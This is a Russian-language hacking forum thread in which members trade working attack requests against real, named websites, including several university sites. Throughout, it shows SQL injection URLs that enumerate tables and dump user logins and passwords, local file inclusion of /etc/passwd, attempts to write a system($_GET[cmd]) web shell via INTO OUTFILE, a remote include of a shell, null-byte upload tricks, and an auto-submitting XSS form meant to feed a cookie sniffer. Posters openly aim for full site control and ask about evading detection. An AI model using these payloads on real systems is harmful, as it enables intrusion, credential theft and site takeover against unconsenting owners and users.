http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.COLUMNS/*
а тут что делать?

http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.COLUMNS/*
а тут что делать?

Аналогично вышеизложенному.

а +where+co lumn_name=0x70617373776F7264+--+ откуда?
и +where+table_schema=0x70726F676574 746F636F6D706574656E63655F6974+and+table_name=0x61 7265617269736572766174615F7574656E7469+limit+1,1+--+
откуда взяось?

а +where+co lumn_name=0x70617373776F7264+--+ откуда?
Это hex представление столбца password

http://terminovo.com/index.php?main_page=products_general_i nfo &products_id=99999999

Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.

Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.
При чем здесь хекс или char? Там же инклуд(и то маловероятно что провернешь), а не скуля

http://www.millikin.edu/athletics/archives_sport.asp?SPORT=6%20and%201=1%20UNION+SEL ECT+1,2,3,NULL+FROM%20INFORMATION_SCHEMA.TABLES%20--


Исключительно в образовательных целях хотелось бы изменить вот эту страничку
http://www.millikin.edu/media/print_release.asp?NEWS_ID=1227

имена таблиц похоже только методом тыка.. через ; пробовал менять таблицу news - толку 0...

noneim
имена таблиц похоже только методом тыка..
можно и не методом тыка ;)
http://www.millikin.edu/athletics/archives_sport.asp?SPORT=(SELECT%20TOP%201%20TABLE _SCHEMA%20FROM%20INFORMATION_SCHEMA.TABLES)
дальше наверно сам разберешся... :)

на всякий случай прочитай:
https://forum.antichat.ru/showthread.php?t=30501

http://www.filmoscope.ru/?id=99999999
помогите подобрать таблицы, до 50 подобрал не получаеться

http://www.filmoscope.ru/?id=99999999
помогите подобрать таблицы, до 50 подобрал не получаеться
http://www.filmoscope.ru/?id=1000000000+union+select+1,2,3,4,5,6,7,8,9/*
пользуйся "order by"

Или 'group by' )
И еще не путай количество полей с таблицами

Узнаю через order+by число столбцов,их 4

http://www.4ips.biz/products.php?id=7+order+by+4/*

но при запросе +union+select

http://www.4ips.biz/products.php?id=7+union+select+1,2,3,4/*

The used SELECT statements have a different number of columns

Что это значит и что делать?

Что это значит и что делать?
Это значит, что ты неправильно подобрал количество полей, попробуй подобрать через group by, либо вручную по очереди через union select

Это значит, что ты неправильно подобрал количество полей, попробуй подобрать через group by, либо вручную по очереди через union select

Совсем не факт, зачем говорить если не знаешь, эту ситуювину я описывал здесь:
http://forum.antichat.ru/showpost.php?p=497033&postcount=21

если ты подобрал кол-во столбцов, но выпадает такая ошибка, то 99% ты имеешь дело с мускулом 3-й версии

если ты подобрал кол-во столбцов, но выпадает такая ошибка, то 99% ты имеешь дело с мускулом 3-й версии

а разве тогда будет ошибка связанная с кол-вом полей? я думал будет ошибка синтаксиса

http://www.rebellino.it/shop/pag_home/multimedia.php?id=-1+union+select+1,2,user(),version(),5,database()/*
Sql47718@62.149.140.24

Sql47718_3

4.0.27-standard-log
помогите пожалуйста с таблицами

а разве тогда будет ошибка связанная с кол-вом полей? я думал будет ошибка синтаксиса

не могу точно сказать почему именно такая ошибка, но я много раз сталкивался с подобной ситуацией

Вполне согласен со Scipio.
Возможно сначала идут 2 разных запроса, получают оба результата, и только после всего этого выводят в html.
И если какойто запрос не выполняется то exit(mysql_error());
имхо

Юзал недавно багу на 1 сайте, линк не помню, в общем посмотрел конфигурацию хостера - мускул 4 версии

есть такой запрос
INSERT INTO `login` (`userid` , `user_pass` , `sex` , `email` , `state` )
VALUES ('user', '1234', 'M', 'a@a.com[sql query]', '0');

собсно, вопрос: можно ли как-нибудь приписать туда свой запрос? у меня получалось добавить только такой же insert
e-mail=a@a.com','0'),('asd','asd','M','b@b.com','0') ;/*
но, хотелось бы чтонибудь более существенное, или инсерт, но с большим количеством столбцов.

вроде так

Подскажите как можно решить вопрос с информацией по названию каталогов на сайте ?????
Есть SQL inj: http://kojyhovo.ru/news/news.php?id=-81+union+select+1,concat(login,char(58),password)+ from+users/*
но не могу найти админку может кто подскажет.

load_file('') не работает!

Заранее спасибо.

Возможно ли тут раскрутить иньекцию?

http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--

Возможно ли тут раскрутить иньекцию?

http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--

Это вобщето инъекция в MSAccess...

теоретически раскрутить можно:
http://www.rochesterautodealers.com/news.asp?id=1%20union%20select%201,2,3,4,5,6,7,8,9 ,10,11%20from%20admins

подбирай таблицы, прав на чтение системных таблиц нет

З.Ы. вобще .Slip в чем то прав, но это так, мысли вслух ни к кому неотносящиеся

Вот мне интересно, что за дыра
http://sait.ru/index.php?fuse=admin&view=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd

В ответ вообще хз, что вылезло.

An error has occurred with the given operation

Fuse: admin
Action:
Type: User Error (256)
Description: View .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist
Script: /var/www/saitdata/www/sait.ru/newedge/classes/NE_Controller.php
Line Number: 88
Stack:
/var/www/sait/data/www/sait.ru/newedge/classes/NE_Controller.php (88) : trigger_error
/var/www/sait/data/www/sait.ru/newedge/front.php (72) : ne_controller::processview
/var/www/sait/data/www/sait.ru/index.php (3) : require

Попробовал по другому.
http://sait.ru/index.php?fuse=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd
Вышло следующее
Module .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist or hasn't been properly installed

С таким никогда раньше не сталкивался.

Дай нормальную урлу - тебе скажут... Так возможный инклуд... Видно, что в скриптах используются свои обработчики ошибок... Что можно сделать - ХЗ. Урлу в студию.

Ссылка удалена

В параметре fuse ничего нет... Всё отфильтровано.

- Существует ли способ скачать запороленный файл с ifolder.ru? Естественно, не зная пароля. Может есть какая-нибудь уязвимость?
- Есть ли уязвимости в гостевой книге "SR + Denied Guestbook v.2.1.5"? В ранних версиях присутствовал баг с файлом passwd.dat, и XSS был, но в этой версии не пашет.

http://www.f1links.com/list.php?id=62'
раскрутите скулю плз. у меня не получилось(

http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encr ypt(concat_ws(0x3a,user(),version(),database()),1) ,1)/*

http://www.f1links.com/list.php?id=-62+union+select+1,convert(count(*)+using+latin1)+f rom+users
4=\
http://www.f1links.com/list.php?id=-62+union+select+1,convert(concat(user,0x3a,pass)+u sing+latin1)+from+users+limit+0,1
david:bla
=
http://www.f1links.com/admin/

Have fun

http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encr ypt(concat_ws(0x3a,user,pass),1),1)+from+users/*
qwerty

Слип цука =\

Только что нашел sql инъекцию, через которую можно слить мыла и пароли юзеров сайта, это уголовно наказуемо?) И как от этого уберечься? Соксы и VPN ?

тибя посодют, а ты неворуй!
это уголовно наказуемо?
да
Соксы и VPN ?
да

А просто запостить в раздел инъекций можно?
P.S. может кому-нибудь понадобится. :)

А просто запостить в раздел инъекций можно?
P.S. может кому-нибудь понадобится. :)
Не можно, а нужно =)...
Если ваша уязвимость на сайте понравится участникам форума, то вам за это даже репутацию повысят...

Есть сайт вида
http://www.site.ru/11/15/
При подстановке одинарной кавычки
http://www.site.ru/11/15'/
Плюет :
Ошибка
Внутренняя ошибка

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `uid` IN (408' at line 1

И отсюда у меня 2 вопроса:

это инъект ?
если да, то какого вида должен быть запрос?

попробуй
http://www.site.ru/11/15+union+select+blablabla+from+hekbla--+/

ZAMUT,
все то же самое:

'+order+by+1+--+

И вот чуток похожая тема, с такими же SQLi'ями:
http://forum.antichat.ru/thread51680.html

Плюнул:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+blablabla+from+hekbla--+) AND `id` IN (SELECT `nid` FROM `node__acc' at line 1

http://www.site.ru/11/15')+order+by+1/*

http://www.site.ru/11/15')+order+by+1/*

Внутренняя ошибка

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')+order+by+1) AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `' at line 1

мм, попробуй тогда:
http://www.site.ru/11/15)+order+by+1%00

если неполочится попробуй

http://www.site.ru/11/15')+order+by+1%00

я чет с просони не совсем понял нужна кавычка или нет

Еще не понял, почему в запрос + идут, вобщем кидай в ЛС сайт, попробую помочь

там не нужна ковычка, а запрос который дал я не выполнится, ибо нет колонки blablabla и таблицы hekbla не существует

кавычка там действительно не нужна, посмотрел на реальном примере, да и вобще там фигня какая то, в запрос вставляется судя по ошибкам но не выполняется, вобще там плюсов не должно быть в ошибке поидее

даже http://www.site.ru/11/15-1 не выполняется

Парни, что за на*уй:
http://bghotelite.com/rent-a-car.php?grad=bg&page=45'
??? Не могу далее ничего сделать...

инъекция в limit скорее всего ничего не получится (почти уверен) хотя

http://bghotelite.com/rent-a-car.php?grad=bg&page=45/*
ну и дальше перебираем количества полей с помощью UNION SELECT 1,2,3... и тд...
Иньекция в лимите возможна и очень легко проводима... другой вопрос в лимите ли она... но судя по всему в лимите

Через лимит инъекция не проводится

Через лимит инъекция не проводится
давай на 10 рублей поспорим?
Вот скажи есть такой запрос
SELECT bla1,bla2 FROM bla LIMIT 1,[inject]
что тебе мешает достроить запрос до такого:
SELECT bla1,bla2 FROM bla LIMIT 1,0 UNION SELECT 1,2

http://bghotelite.com/rent-a-car.php?grad=bg&page=45/*
ну и дальше перебираем количества полей с помощью UNION SELECT 1,2,3... и тд...
Иньекция в лимите возможна и очень легко проводима... другой вопрос в лимите ли она... но судя по всему в лимите
Дошел до 20 и дальше уже в лом :( По непонятным мне причинам я наехал сегодня на БГ :D Выложил в SQL-INJ скулю в официальном сайте президента БГ. Сам не знаю, что на меня нашло =)))

Начальная страница - первый параметр ))))
А второй по сколько выводим, а такое вот:

limit 0/* - нифига не пашет

Начальная страница - первый параметр ))))
А второй по сколько выводим.Пример в студию работающий со вторым параметром (хоть 1)
Спасибо большое что сказал насчет первого параметра если б не ты :)...
Я привел пример... ну подумаешь в данном случае пример запроса изменится SELECT bla1,bla2 FROM bla LIMIT [inject],10
ничего собственно не меняется:
SELECT bla1,bla2 FROM bla LIMIT 0 UNION SELECT 1,2/*,10
ЗЫ пжлст пиши понятней а то с 3-его раза врубился в то что ты хотел сказать...
limit 0/* - нифига не пашет пашет:
http://bghotelite.com/rent-a-car.php?grad=bg&page=0/*

Дошел до 20 и дальше уже в лом :( По непонятным мне причинам я наехал сегодня на БГ :D Выложил в SQL-INJ скулю в официальном сайте президента БГ. Сам не знаю, что на меня нашло =)))
Кстати как вариант перед лимитом там может стоять ORDER BY что не дает тебе возможность юзать юнион...

Спасибо, было поучительно =)) +

Кстати как вариант перед лимитом там может стоять ORDER BY что не дает тебе возможность юзать юнион...

Так обычно и бывает, в limit невозможно использовать выражения, возможно только Into outfile вставить (я про слу чай когда order by используется), еслиб можно постить какието вещи типа в название записать строчку пхп кода, которая комманды позволяет использовать тогда да, но при этом кавычки не должны экранироваться и есть файл прмв, но такое еще реже

У меня вопрос. Попалась такая ошибочка:

Warning: main(): Failed opening '4' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /bla/www/site.com/main.php on line 290

Это PHP инклюд, да? Как составить запрос, чтобы прочитать /etc/passwd? SQL-INJECTION у меня такая:

http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,4,5,6,7/*

У меня вопрос. Попалась такая ошибочка:

Warning: main(): Failed opening '4' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /bla/www/site.com/main.php on line 290

Это PHP инклюд, да? Как составить запрос, чтобы прочитать /etc/passwd? SQL-INJECTION у меня такая:

http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,4,5,6,7/*
Почитай немного статей (лучше много) про инклуд и скуль инж, тогда ты может быть поймёшь разницу.

http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,0x2F6574632F70617 3737764,5,6,7/*

Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версииhttp://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9/*Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabledhttp://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_t ype,auth_level,auth_status),3,4,5,6,7,8,9+from+use rs+limit+0,1/*Что за херь?! Хэлп!

Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версииhttp://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9/*Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabledhttp://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_t ype,auth_level,auth_status),3,4,5,6,7,8,9+from+use rs+limit+0,1/*Что за херь?! Хэлп!

в других БД значит вот например здесь есть:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,passwd,username ,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+f rom+calculator.users+limit+0,1/*


еще в dissertations.users есть

Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версииhttp://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9/*Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabledhttp://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_t ype,auth_level,auth_status),3,4,5,6,7,8,9+from+use rs+limit+0,1/*Что за херь?! Хэлп!
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(TABLE_SCHEMA),3,4,5,6,7,8,9 from information_schema.tables WHERE table_name='users' limit 0,1/*
тебе это ни о чем не говорит? Мне например что таблиц users всего 4-е o_O штуки и находятся они в 4-ех разных базах...
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(COLUMN_NAME),3,DATABASE(),5,6,7,8,9 from information_schema.COLUMNS WHERE table_name='users' AND TABLE_SCHEMA='feeds' limit 0,1/*
Это же о том что в этой таблице 7 столбцов, ты написал 8 o_O... Эти столбцы: "username,fname,lname,email,auth_level,auth_status, auth_type"
Ну и вот вывод:
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,CONCAT_WS(':',username,fname,lname,email,auth_le vel,auth_status,auth_type),3,DATABASE(),5,6,7,8,9 from users/*

существует дефолтная папка для мамбы?

что можно сделать если на сайте есть скуль-инж. Я могу выводить в браузер данные юзеров. (мне их данные не нужны, админки нет). Если я впишу <? include("http://shell"); ?> а потом выведу его на экран, он не выполнится как пхп код? или выполнится? Почему?
---
как можно заливать шелл с помощью скуль-инж в мускул сервере 5 версии? Load_File() не работает

через into oufile еще можно... но видимо, т.к. привилегий file у юзера нет, то и это не прокатит. кстати, load_file нужен для чтения файлов, а не записи)

Есть SQL-инъекция в запросе INSERT.
Можно ли туда как-нибудь всунуть union или просто select? (кроме "on duplivate key..." и вставки ещё одного ряда)
Спасибо.

вопрос остался неотвеченым:
Если я впишу <? include("http://shell"); ?> а потом выведу его на экран, он не выполнится как пхп код? или выполнится? Почему?

SpYeR нет (читатай раздел статьи)

Girsoft Куда впишешь? каким образом ты введешь на экран?

Piflit Ответ ты можешь скачать в интренете и посмотреть

на сайте есть форма, всё введённое в неё добавляется в базу данных мускул 5 версии.(без фильтрации)
есть скуль иньекция в (index.php?id=999+union+select+1,2,3,4/*) и я могу вывести на экран инфу, что я ввёл в форму (и то что другие ввели тоже, коненчо)
(столбец 3 выводится на экран)

ничего ты не зальешь, у тебя file_priv() отключен

тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД)

И ещё один вопрос:

на сайте есть уязвимость (локальный инклуд)

index.php?menu=../../../../../etc/passwd%00

На страницу выводятся пароли.
От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал?

ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!

очень странно, что ты нашел там пароли, пароли эти например от ssh или ftp
99% "расшифровать" их можно с помощью passwordpro или jtr...

но я опять же сомневаюсь, что хеши паролей там есть... про локальный инклюд читай здесь:http://forum.antichat.ru/showpost.php?p=495764&postcount=535

как фильтрацию обойти ?
http://fun2fon.ru/index.php?cntsearch='
http://fun2fon.ru/index.php?cntsearch=-1+union+select+1/* что вообще можно сделать?

тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД)

И ещё один вопрос:

на сайте есть уязвимость (локальный инклуд)

index.php?menu=../../../../../etc/passwd%00

На страницу выводятся пароли.
От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал?

ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!
Да, толькое если есть файл прив. Иначе никак.

Как таковые, эти пароли не особо нужны. Но, можно методом тыка найти довольно нужные файлы конфигов. Так же, просизвести локал инклуд. Т.е. если на том сайте где ты нашёл этот инклуд, есть загрузка каких либо файлов, то загружаешь этот файл с кодом шелла внутри, и уже инклудишь этот файл. Считай шелл у тебя на руках. Рекомендуется к прочтению (и копипасту:d):
https://forum.antichat.ru/thread49775.html
Хотя может это просто читалка файлов, выгоды от неё конечно меньше, т.к. код не интерпретируется, но и с неё можно получить выгоду.

file_priv это не функция, не надо скобки ставить =)

вот искал рефераты на тему алюминия...
http://studentport.su/referats/referat.php?id=23968
http://studentport.su/referats/referat.php?id=-1'
http://studentport.su/referats/referat.php?id=-1+order+by+11/*
http://studentport.su/referats/referat.php?id=-1+union+selct+1,2,3,4,5,6,7,8,9,10,11/*
помогите плииз :D

А в чем сложность? это mssql
http://studentport.su/referats/referat.php?id=1+or+1=@@version

http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES)--

У меня вопрос, почему при таком запросе ругается ?

http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('page'))--

Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in c:\inetpub\wwwroot\referats\globals.php on line 86

У меня вопрос, почему при таком запросе ругается ?

http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('page'))--

Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in c:\inetpub\wwwroot\referats\globals.php on line 86

кавычка экранируется

а обойти ? Я в hex' е пробовал, не катит ..

Все, вопрос исчерпан.

Помогите плис. Есть сайт: бла...бла...бла/1.php?page=1
Я подставил: бла...бла...бла/1.php?page=1'
Мне выдало:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in …
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in …

Узнал установочную директорию сайта.
Потом я подставил:
-1+union+select+1,2,3,4,5,'<?php system($_GET[cmd]); ?>'+from+mysql.user+into+outfile+' бла...бла...бла/shzw.php '/*

В виде HTML(изменилось такое):

Раньше было:
<form action=1.php?page =-1 method="POST">
на
<form action=1.php?page =-1 union select 1,2,3,4,5,\'<?php system($_GET[cmd]); ?>\' from mysql.user into outfile \'…/shzw.php\'/* method="POST">


Но шелл не создался. И да кстати я не уверен что правильно подобрал количество полей.

Чем помочь то?)

PS Ты уверен что есть file_priv ?

magic quotes 1 или просто экранируются кавычки в запросе. инто аутфайл не сделаешь. если файл прив все таки есть, можешь лоудить кодируя в хекс... (пишет это тут раз в пиццотый, *пошел составлять мануал)))))

Судя по \'<?php system($_GET[cmd]); ?>\' то как сказал Чёрный БР экранируются кавычки и фай зплить через инто аутфайл нельзя. Подбири правильно кол-во столбцов и может в таблицах найдёшь чё интересного
"*пошел составлять мануал)"
омфг "/

Чем помочь то?)

PS Ты уверен что есть file_priv ?

Помочь взломать сайт (хотелось бы залить шелл). Я не знаю. А как проверить есть ли file_priv?

Судя по \'<?php system($_GET[cmd]); ?>\' то как сказал Чёрный БР экранируются кавычки и фай зплить через инто аутфайл нельзя. Подбири правильно кол-во столбцов и может в таблицах найдёшь чё интересного
"*пошел составлять мануал)"
омфг "/

А как узнать что я правильно подобрал столбцы??? Тогда ошибок не должно быть??? И есть ли какая-нибудь программа для автоматического подбора???

да ошибки могут и быть. страница с правильным кол-вом столбцов должна отличаться от страниц с другим кол-вом столбцов. В идеале увидешь свои циферке на странице)

Спасибо. За помощь буду подбирать. У меня еще такой вопрос: у меня есть исходный код этого скрипта и таблица(но она не полная, возможно нет некоторых столбцов), может ли мне это чем-то помочь в подборе столбцов.

Что за хня может быть:
есть исходника скриптов, делаю МуСкул-инекцию после ЛИМИТ, а она не проходит.
Делаю - display=1,1/* - нормально могу управлять ЛИМИТОМ.
потом устанавливаю через коментарии, что 4 база МуСкула.
делаю display=1,1+union+select+null,null,n.../* короче, скрипт перебирает, но вегда пустое значение,
пробовал заменить пробулы на /**/ - ничего.
Подскажите, что это может быть и варианты как обойти

Может
Найди в коде запрос с уязвимой переменной, там будет что то типа
Select blabla,blabla2,blabla3 from blablatable where blablaid=$id
если так, то кол во столбцов 3
если будет типа
select * from blablatable where blablaid=$id
то надо уже смотреть таблицу
=================================
upd
инъекция после лимита don't work

я уже смотрел исходники там:
SELECT DISTINCT cds_Prod.*, cc_ProductSummary.*, imPRICE.* FROM cds_Prod,cc_ProductSummary,imPRICE WHERE .... LIMIT $display,10

пробовал даже display=1,1 union SELECT cds_Prod.*, cc_ProductSummary.*, imPRICE.* FROM cds_Prod,cc_ProductSummary,imPRICE limit 1,1/*

тоесть по идеи должно работать, но что-то не хочет. Может какие-то настройки сервера?

Spyder большое спасибо за помощь. Уже подобрал столбцы.
Теперь надо использовать эту уязвимость чтоб получить полный доступ к сайту.
Использовал USER(),VERSION(), DATABASE() – все получил. Но что с этого??? Я хочу получить полный доступ!!! Помогите плис.

Если версия >5 извлекай инфу из information_schema
если <5 подбирай названия таблиц вручную
Вообще почитай статьи, на ачате они в большом количестве, там всё хорошо описано
Рекомендую статью Зако, она в этом разделе закреплена как важная
======
upd
https://forum.antichat.ru/thread19844.html

Как прочесть пасс и логин когда я знаю как называется таблица, и столбец. Можно ли использовать например такое:
1.php?page=-1+union+select+1,2,3,4,5,6+from+users+where+id=1/*

Если да, то почему у меня не получается ???
И еще вопрос можно ли изменить ячейку в любом столбце, например поставить в столбце «уровень админа» 1 или нет???

Изменить не получится
пробуй так
1.php?page=-1+union+select+username,2,3,4,5,6+from+users+where +id=1/*
1.php?page=-1+union+select+login,2,3,4,5,6+from+users+where+id =1/*
1.php?page=-1+union+select+user,2,3,4,5,6+from+users+where+id= 1/*

Учи мат часть =-\

Если да, то почему у меня не получается ???
Потому что в запросе ты указал таблицу для вывода, а колонки нет.
И еще вопрос можно ли изменить ячейку в любом столбце, например поставить в столбце «уровень админа» 1 или нет???
Если бд mysql - нет.

Если сайт перевести частично на мод.рерайт. К примеру, элементы вида ' index.php?page=1 ' преобразились в вид ' /page/1/ ' то есть получается, что проверка на фильтрацию сводится до минимума и вандалам не найти sql.inj, не так ли?

Я не о том, что игнориуется она в случае перехода к чпу. Возможно ли благодаря мод.рерайт обезопасить портал? И может быть он не столь эффективен? Спасиб.)

какая разница?
/page/1'
=\

Расскажите ка мне в чём проблема =)
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20+from+information_schema.tables

юзеру мускула не хватает прав для листинга метадаты в этом фолдере хран. information_schem'ы

Ситуация: нашел sql инъекцию, узнал пасс админа, зашел под админом. Могу присвоить картинки некоторым предметам, изменять некоторые предметы. И все. Как можно залить шелл??? Пробовал присвоить картинку шелл.рнр , но там есть фильтр. Помогите залить шелл.

а что за админка то? насколько я понял возможен аплоад файлов попробуй впиши веб шелл в файлы с именами bla.php%00.jpg или bla.php.rar...

Админка от онлайн игры.
Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.

помогите подобрать таблу с юзерами

http://wapclick.info/forum/readmess.php?UIN=Guest&pass=Guest&next_row=1&topic=-1+union+select+0,0,1,0,2,0/*&room=1&user=1

Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.

Пр удачной для тебя настройке сервера, т е magic_quotes_gpc=off и наличии кривого скрипта, файл загурзится с именем bla.php%00.jpg, после вызова функции copy() нулевой байт откинет разшерение .jpg и у тебя будет файл bla.php

http://www.verra-motors.ru/main/index.html?id=5'INSERT%20INTO%20Users%20VALUES('ad min',%20'123')
Я конечно извиняюсь, может я нареоман в синтаксисе Mysql, но почему ошибки вылазят?

нельзя в mysql inj вставлять записи

Разве что уязвимый запрос будет:

INSERT INTO [SQL-INJ] bla lba... /*

Klaus Doring у тебя идет выборка из таблицы т.е. можно только выбирать данные из таб и притом еще с объед запросом union ENFIX тебе показал как можно вставить данные, посмотри может на сайте есть рега и может там есть скуль.

Спасибо за ответ, реги нет, как в данном случае лучше провести инъекцию? Юзал поиск, но пожохдящей статьи не нашел, нет ни одной универсальной. Просто вот решил освоить, это мой первая найденная руками скуля :)

если не нашёл подходящей статьи значит плохо искал =\

Закидываю шелл на сайт и мне выдает: Warning: copy(бла_бла_бла/шелл.php) [function.copy]: failed to open stream: Permission denied in бла_бла_бла/function.inc on line 19

Смотрел и не увидел ошыбки. В чем трабл???
И еще вопрос: что можно сделать если есть мускул инъекция???
Я узнал USER(), VERSION(), DATABASE()
Можно ли узнать логин и пароль к ФТП???

Закидываю шелл на сайт и мне выдает: Warning: copy(бла_бла_бла/шелл.php) [function.copy]: failed to open stream: Permission denied in бла_бла_бла/function.inc on line 19

Смотрел и не увидел ошыбки. В чем трабл???
И еще вопрос: что можно сделать если есть мускул инъекция???
Я узнал USER(), VERSION(), DATABASE()
Можно ли узнать логин и пароль к ФТП???

скорее всего у тебя нулевые права, т.е. ты не сможешь залить пока папка бла_бла не будет тебе доступна.
общий синтаксис команды copy
copy (string source, string dest)
источник/приемник. по пробуй прописать полный путь до папки с корня.
Про то что можно сделать имея скуль читай здесь
http://forum.antichat.ru/thread43966.html

Всем привет!

Вообщем такая штука:
на один мыльный сервис я отправил письмо с "картинкой".gif ,серверу сказал чтобы .gif обрабатывал как php-скрипт. Решил проверить, что получилось
Открываю новое письмо, смотрю - скрипт заработал, НО скрипт работает, если там есть такая строчка:
(я взял один готовый, который использовали для форумов)

Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="coastal.ru - login"');


Точнее сказать вышеприведенный код выполняется, появляется соответствующее окно, но я хочу чтобы выполнялись другие действия, которые почему-то не хотят работать. То есть та фишка работает, а другой мой скрипт нет...почему может такое быть, как избавиться от такой проблемы??

С меня куча ++
P.S. вот тема (дубль получился :) ) - http://forum.antichat.ru/thread55926.html

http://allhockey.ru/ на этом сайте в поле поиск есть xss....
фильтра там помойму вообще нет...кто чем помочь может развить идею?)

http://www.championat.ru/
http://www.championat.ru/includes/index.tpl
есть запросы в бд....но опять же, как использовать?)

http://allhockey.ru/ на этом сайте в поле поиск есть xss....
фильтра там помойму вообще нет...кто чем помочь может развить идею?)
Дай кому-нить ссылку на хтмл следующего содержания:

<html>
<head>
<title></title>
</head>
<body onload="document.replier.submit();">
<form action="http://allhockey.ru/find/do-search.query-post.page-0.html" name="replier" id="find" method="post">

<input
type="text"
name="query"
value='"><script>alert(1)</script>' />

</form>
</body>
</html>

Он увидит алерт. За место алерта ввсунь ссылку на снифер.
Зы Если на этом сайте куки вообще используются :)

Дай кому-нить ссылку на хтмл следующего содержания:

<html>
<head>
<title></title>
</head>
<body onload="document.replier.submit();">
<form action="http://allhockey.ru/find/do-search.query-post.page-0.html" name="replier" id="find" method="post">

<input
type="text"
name="query"
value='"><script>alert(1)</script>' />

</form>
</body>
</html>

Он увидит алерт. За место алерта ввсунь ссылку на снифер.
Зы Если на этом сайте куки вообще используются :)
всё используется, пасиба за линк =)

Такой вопрос. Получаю доступ к админке на форуме ipb, но залить шелл могу через раз.
Отчего это зависит? От настроек сервера или форума? Пытался изменить настройки на форуме, не получилось.

всмысле: Получаю шелл на форуме ipb, но залить шелл могу через раз.

Объясни эту строчку поподробнее...

Перепутал. :)
После того как получу пароль от админки, иду заливать шелл. r57shell, c99shell, не важно. Заливать получается через раз.
